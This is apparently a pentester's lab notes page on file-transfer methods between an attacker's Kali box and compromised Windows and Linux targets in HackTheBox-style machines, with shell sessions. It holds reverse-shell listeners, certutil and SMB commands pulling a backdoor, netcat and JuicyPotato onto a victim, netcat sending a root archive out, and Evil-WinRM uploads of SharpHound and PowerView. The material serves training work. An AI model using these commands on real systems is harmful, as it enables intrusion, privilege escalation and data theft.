File Transfer between Windows,Linux Machines Link to heading
Method-1- FTP Link to heading
Some time FTP option is enabled with “anonymous” user and password any or blank.
$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> exit
421 Service not available, remote server has closed connection
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ echo "sample file rchitect" > test.txt
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> ^C
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
22 bytes sent in 0.00 secs (477.4305 kB/s)
ftp> exit
221 Goodbye.
Method-2 - SMB Transfer Link to heading
If we have reverse normal shell to the Windows machine, most of the case “SMB transfer” should work
──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49674
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv>
SMBshare transfer between Linux and Windows
Its beter to add option smb2support as most the machines have disabled SMB1. If you try without -smb2suport option it will initaite a smb connection.
SMB1 commands did not work for me and when i specififed the smb2support the copy happened from Linux to Windows.
PS C:\Users\Destitute\Documents\temp>
net use \\10.10.14.4\share\
PS C:\Users\Destitute\Documents\temp>
copy \\10.10.14.4\share\nc.exe nc.exe
PS C:\Users\Destitute\Documents\temp> copy : Cannot find path '\\10.10.14.4\share\nc.exe' because it does not exist.
At line:1 char:1
+ copy \\10.10.14.4\share\nc.exe nc.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\10.10.14.4\share\nc.exe:String) [Copy-Item], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyItemCommand
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
On WIndows using the smb2support the copy happens
PS C:\Users\Destitute\Documents\temp> PS C:\Users\Destitute\Documents\temp>
copy \\10.10.14.4\share\nc.exe nc.exe
ls
Directory: C:\Users\Destitute\Documents\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:23 59392 nc.exe
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/10/2018 23:07 Administrator
d----- 12/10/2018 23:12 DefaultAppPool
d----- 12/10/2018 20:16 Destitute
d-r--- 12/10/2018 20:08 Public
d----- 12/10/2018 23:54 test
d----- 12/10/2018 23:40 WWW Anon Access
cd Destitute
cd Documents
net use \\10.10.14.12\share /u:df df
The command completed successfully.
copy \\10.10.14.12\share\JuicyPotato.exe JuicyPotato.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully
Method 3- Certutil Link to heading
Run a Simple python webserver on Linux which as webserver . By default it run on port 8000 and you can specify any ports including 80.
Run Simple http server on Source Linux machine:
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ python -m http.server 130 ⨯
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Use the “certutil “command to get the from from linux macine on destination windows machine. Rember the port is 8000 which should be specified while using the command:
certutil -urlcache -split -f "http://10.10.14.4:8000/backdoor.exe" "backdoor.exe"
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of C:\Users\Destitute\Documents\temp
09/03/2022 00:54 <DIR> .
09/03/2022 00:54 <DIR> ..
09/03/2022 00:54 7,168 backdoor.exe
03/03/2022 00:23 59,392 nc.exe
2 File(s) 66,560 bytes
2 Dir(s) 9,707,196,416 bytes free
The Same can be validated from Linux machine where we run the http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.116 - - [08/Mar/2022 19:54:35] "GET /backdoor.exe HTTP/1.1" 200 -
10.10.10.116 - - [08/Mar/2022 19:54:35] "GET /backdoor.exe HTTP/1.1" 200 -
Method-4 SMB transfer from Windows to Linux Link to heading
In this case the source Machine is Windows and Destination in Linux. The Same method of SMBshare can be used in this case as well/
Run the SMBSHARE service on Linux Machine
smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:
Use the copy comamnd from Windows to Linux( file wil be copied from Windows to Linux)
net use \\10.10.14.4\share\ /u:df df
copy result1.log \\10.10.14.4\share\result1.log
Method-5 Netcat for file transfer Link to heading
In this scenario i am using both Linux machine and both have netcat running. If netcat running on windows machine same method can be tried between windows too.
On Source linux machine where file exists-Filename root1.zip and 10.10.14.2 is the destination linux machine IP.
nc 10.10.14.2 4444 < /tmp/root1.zip
On kali machine( destination linux machine where the file needs to be transferred)
nc -lnvp 4444 > root1.zip 1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.58] 36426
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ ls
backup root root1.zip
Method 6: Evil-winrm upload/download method Link to heading
Evil-winrm is a tool which can be used to connect from linux to windows.
evil-winrm -i 10.129.96.x -u oliver -p c1cdfunxxxxx
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> cd c:\
*Evil-WinRM* PS C:\> cd programdata
*Evil-WinRM* PS C:\programdata> upload /home/rocky/tool/exp/windows/SharpHound.exe
Info: Uploading /home/rocky/tool/exp/windows/SharpHound.exe to C:\programdata\SharpHound.exe
Data: 1211048 bytes of 1211048 bytes copied
Info: Upload successful!
Same goes for downloading as well using evil-winrm
Evil-WinRM* PS C:\programdata> download c:\programdata\20220705164546_BloodHound.zip /home/rocky/tool/exp/windows/20220705164546_BloodHound.zip
Info: Downloading c:\programdata\20220705164546_BloodHound.zip to /home/rocky/tool/exp/windows/20220705164546_BloodHound.zip
Info: Download successful!
Make sure you specify the full path while upload or download, refer below where i have not mentioned the full path. Even if it gives a message succesful upload the file not present in target folder.
*Evil-WinRM* PS C:\> cd ProgramData
*Evil-WinRM* PS C:\ProgramData> dir
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
*Evil-WinRM* PS C:\ProgramData>
*Evil-WinRM* PS C:\ProgramData> upload /home/rocky/tool/exp/windows/AD/PowerView.ps1 PowerView.ps1
Info: Uploading /home/rocky/tool/exp/windows/AD/PowerView.ps1 to PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\ProgramData> dir
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
Now I am mentioning the full path and we can see the upload is succesful.
Evil-WinRM* PS C:\ProgramData> upload /home/rocky/tool/exp/windows/AD/PowerView.ps1 C:\ProgramData\PowerView.ps1
Info: Uploading /home/rocky/tool/exp/windows/AD/PowerView.ps1 to C:\ProgramData\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\ProgramData> dir
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/17/2022 5:16 PM 770279 PowerView.ps1
You can see the uploaded file “powerview.ps1”